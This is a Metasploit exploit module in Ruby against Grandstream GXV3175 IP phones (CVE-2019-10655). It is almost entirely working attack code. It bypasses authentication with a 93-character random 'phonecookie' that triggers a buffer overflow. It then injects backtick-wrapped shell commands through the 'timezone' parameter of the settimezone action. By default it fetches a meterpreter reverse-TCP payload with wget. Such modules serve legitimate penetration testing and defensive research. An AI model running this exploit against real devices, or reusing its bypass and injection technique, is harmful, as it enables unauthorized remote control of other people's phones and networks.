Grandstream GXV3175 Unauthenticated Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",  
'Description' => %q{  
This module exploits a command injection vulnerability in Grandstream GXV3175  
IP multimedia phones. The 'settimezone' action does not validate input in the  
'timezone' parameter allowing injection of arbitrary commands.  
  
A buffer overflow in the 'phonecookie' cookie parsing allows authentication  
to be bypassed by providing an alphanumeric cookie 93 characters in length.  
  
This module was tested successfully on Grandstream GXV3175v2  
hardware revision V2.6A with firmware version 1.0.1.19.  
},  
'Author' => [  
'alhazred', # Command injection vulnerability discovery and exploit  
'Brendan Scarvell', # Auth bypass discovery  
'bcoles' # Metasploit  
],  
'License' => MSF_LICENSE,  
'Platform' => 'linux',  
'References' => [  
[ 'CVE', '2019-10655' ],  
[ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],  
[ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]  
],  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
},  
'DisclosureDate' => '2016-09-01',  
'Privileged' => true,  
'Arch' => ARCH_ARMLE,  
'DefaultOptions' => {  
'PrependFork' => true,  
'MeterpreterTryToFork' => true,  
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',  
'CMDSTAGER::FLAVOR' => 'wget'  
},  
'CmdStagerFlavor' => %w[wget],  
'Targets' => [  
['Automatic', {}]  
],  
'DefaultTarget' => 0  
)  
)  
end  
  
def check  
res = send_request_cgi(  
'uri' => '/manager',  
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",  
'vars_get' => {  
'action' => 'settimezone',  
'timezone' => ''  
}  
)  
  
if res && res.code == 200 && res.body.to_s.include?('Response=Success')  
return CheckCode::Detected('phonecookie authentication bypassed successfully.')  
end  
  
CheckCode::Safe  
end  
  
def execute_command(cmd, _opts)  
res = send_request_cgi(  
'uri' => '/manager',  
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",  
'vars_get' => {  
'action' => 'settimezone',  
'timezone' => "`#{cmd}`"  
}  
)  
unless res  
fail_with(Failure::Unreachable, 'Connection failed')  
end  
unless res.code == 200  
fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")  
end  
unless res.body.to_s.include?('Response=Success')  
fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")  
end  
end  
  
def exploit  
execute_cmdstager(  
linemax: 220, # 255 minus URL encoding  
background: true  
)  
end  
end  
`